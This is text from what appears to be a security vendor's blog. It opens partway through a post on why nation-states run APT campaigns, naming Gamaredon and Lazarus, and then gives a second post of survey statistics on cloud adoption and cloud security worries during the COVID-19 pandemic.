Global Political Influence – Nations have long used psyops to gain an advantage over other countries, but cyberspace has given them the means to do so on a scale that was never dreamt of before. Nations can interfere with political processes in other countries with little regard and great reward. For example, nation-state actors meddling in the Scottish independence referendum, U.K. Brexit referendum, and the U.S. 2016 and 2020 elections are well-documented.

Regional Politics – Nations also want to exert strength in cyberspace to resolve (or escalate) regional conflicts. Chinese cyberattacks on Indian entities followed a skirmish between the two nations in the mountainous border region of Ladakh that resulted in dozens of casualties. Ukrainian security services reported in 2019 that Russian-backed Gamaredon APT had repeatedly targeted Ukrainian military and law enforcement agencies and individuals. Gamaredon reportedly launched at least 482 cyberattacks against Ukrainian critical infrastructure targets in a Russian-backed campaign to pursue a proxy war in cyberspace without incurring the political fallout of an actual, boots-on-the-ground military campaign.

Industrial Espionage – Unlike “classic” espionage, this activity is specifically aimed at closing the economic gap between nations by stealing intellectual property, then using it to either copy and reproduce technology or gain other unfair commercial advantages. China has been widely accused of engaging in spying on Western businesses, government agencies and technology companies for just this purpose. For example, desiring to build its own stealth jet, the Asian superpower is believed to have stolen the proven design of the US F-35 to shorten development and “time to market.” It’s been estimated that theft of American trade secrets by China costs the U.S. somewhere in the region of $300 billion to $600 billion every year.

Crime – Some nations are under extreme financial burden, made worse by international sanctions, so they resort to cybercrime to fill their coffers. North Korea is notorious for utilizing cybercrime for such purposes, and recently launched yet another campaign aimed at stealing money from U.S. banks and ATMs. Other APT Lazarus campaigns have focused on stealing cryptocurrencies and impersonating cryptocurrency exchanges. Unlike many other APTs, Lazarus writes malware that targets macOS users, too, as Apple’s platform is increasingly used by C-suite executives and others wary of the plethora of Windows malware.

The future

Stay tuned for part two of this blog, where I discuss the future of APT groups and how we defend against them, then and now. For more information on the use of endpoint security in the defense of advanced threats, read our solution brief Fitting Endpoint Security to Your Organization.

Storms Ahead: The Dark Side of the Rush to the Cloud

Despite being constantly referred to as “the new normal,” the changes wrought by the COVID-19 pandemic are usually expressed in terms of endings. The end of the office. The end of the shopping mall. The end of the all-you-can-eat buffet. But there are some cases in which the pandemic has actually brought about growth—for example, the home office. Toilet paper. And the cloud.

Cloud adoption plans were already well underway by the time the COVID-19 pandemic began. But while most companies already had a digital transformation strategy in place, in many cases the new work reality wrought by the pandemic resulted in these plans being accelerated. For example, when businesses were forced to adopt remote work practically overnight, they drastically increased their dependence on cloud-based services, particularly videoconferencing and collaboration apps such as Zoom, Microsoft Teams and Slack.

During the first quarter of 2020, software company Flexera asked 750 global cloud decision makers and users about their cloud usage to get a better picture of who was moving to the cloud, how quickly they were moving, and some of the challenges they were facing. The resulting data shows a digital transformation landscape approaching maturity and largely delivering on its promises to improve the ways work gets done. But while problems stemming from unfamiliarity and inexperience are decreasing, more perennial problems have begun taking their place — particularly the complexity of securing the cloud, and the many and varied dangers businesses can face if they fail to do so.

IDG’s 2020 Cloud Computing Study found that 92% of organizations say their IT environment is at least somewhat in the cloud, with 38% saying they’re completely or nearly all in the cloud today. This finding was borne out by Flexera’s conclusions. In their 2020 State of the Cloud report [1], Flexera reported that businesses in almost all industries leverage cloud computing, with more than half reporting they use cloud heavily and have reached the advanced cloud maturity level. Only 10% of respondents reported still being in the planning stage of their respective cloud strategies.

Notably, for the first time in the history of their State of the Cloud report, Flexera found that none of the respondents said they lacked cloud plans.

Just as significant is the speed at which companies are moving to the cloud. The IDG study found that 60% of respondents said they expected to be completely or nearly all in the cloud in 18 months, while Flexera’s respondents reported 53% of their workloads are run in a public cloud — a number they expected to rise to 60% over the next year.

Half of the Flexera study respondents’ data is housed in a public cloud, and that share is forecast to rise 8% during the same time period.

While previous Flexera studies have found some respondents were reluctant to put sensitive consumer or corporate financial data in the cloud, more than half of the organizations surveyed this year said they’ll consider moving at least some of this type of data to the cloud.

Similar cloud research conducted by global research and advisory firm Gartner offers a look at the financial implications of digital transformation. Gartner’s data shows that the global public cloud market is expected to grow from $227.8 billion to $266.4 billion year over year, the largest portion of which will be allocated to SaaS offerings.

While findings from Flexera’s 2019 State of the Cloud report showed “managing cloud spend” and “governance” as the top cloud challenges, the most recent study showed that security had moved into the top spot for both SMBs and enterprises. 81% of respondents reported security as a challenge, including 83% of enterprises. In fact, “security” appeared in the top 3 concerns in every maturity category, from beginner to advanced.

Clearly, cloud maturity doesn’t solve all cloud challenges — particularly when attackers are getting more and more inventive when it comes to attacks on the cloud. But there is a lot you can do to safeguard your cloud usage and get the most out of your cloud investment. To learn more, register for the upcoming Mindhunter webinar.

[1] © 2020 Flexera. All rights reserved. This work by Flexera is licensed under a Creative Commons Attribution 4.0 International License.